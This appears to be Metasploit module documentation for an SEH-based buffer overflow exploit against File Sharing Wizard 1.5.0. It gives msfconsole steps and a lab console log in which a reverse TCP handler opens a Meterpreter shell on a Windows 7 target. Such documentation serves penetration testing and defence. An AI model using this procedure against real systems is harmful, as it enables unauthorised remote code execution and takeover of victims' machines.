50 lines
1.5 KiB
Markdown
50 lines
1.5 KiB
Markdown
|
## Description
|
||
|
|
|
||
|
|
This module exploits a vulnerability in File Sharing Wizard version 1.5.0 which
|
||
|
|
allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter.
|
||
|
|
|
||
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
This module has been tested successfully on:
|
||
|
|
|
||
|
|
* Windows 7 x86 SP1
|
||
|
|
|
||
|
|
The application installer is linked below
|
||
|
|
|
||
|
|
[File Sharing Wizard Installer](https://www.exploit-db.com/apps/da3a3626f99a85f9ab59ab77f083ff80-fs-wizard-setup.exe)
|
||
|
|
|
||
|
|
Once installed run the application and click "Start" to enable the server.
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Start `msfconsole`
|
||
|
|
2. Do: `use exploits/windows/http/file_sharing_wizard_seh`
|
||
|
|
3. Do: `set rhosts [IP]`
|
||
|
|
4. Do: `run`
|
||
|
|
5. Your payload should get executed
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
```
|
||
|
|
msf5 > use exploit/windows/http/file_sharing_wizard_seh
|
||
|
|
msf5 exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101
|
||
|
|
RHOSTS => 192.168.56.101
|
||
|
|
msf5 exploit(windows/http/file_sharing_wizard_seh) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||
|
|
[*] 192.168.56.101:80 - Connecting to target
|
||
|
|
[*] 192.168.56.101:80 - Sending payload to target
|
||
|
|
[*] Sending stage (180291 bytes) to 192.168.56.101
|
||
|
|
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49164) at 2019-10-03 23:09:18 +0100
|
||
|
|
|
||
|
|
meterpreter > sysinfo
|
||
|
|
Computer : TARGET
|
||
|
|
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
|
||
|
|
Architecture : x86
|
||
|
|
System Language : en_GB
|
||
|
|
Domain : WORKGROUP
|
||
|
|
Logged On Users : 1
|
||
|
|
Meterpreter : x86/windows
|
||
|
|
meterpreter >
|
||
|
|
```
|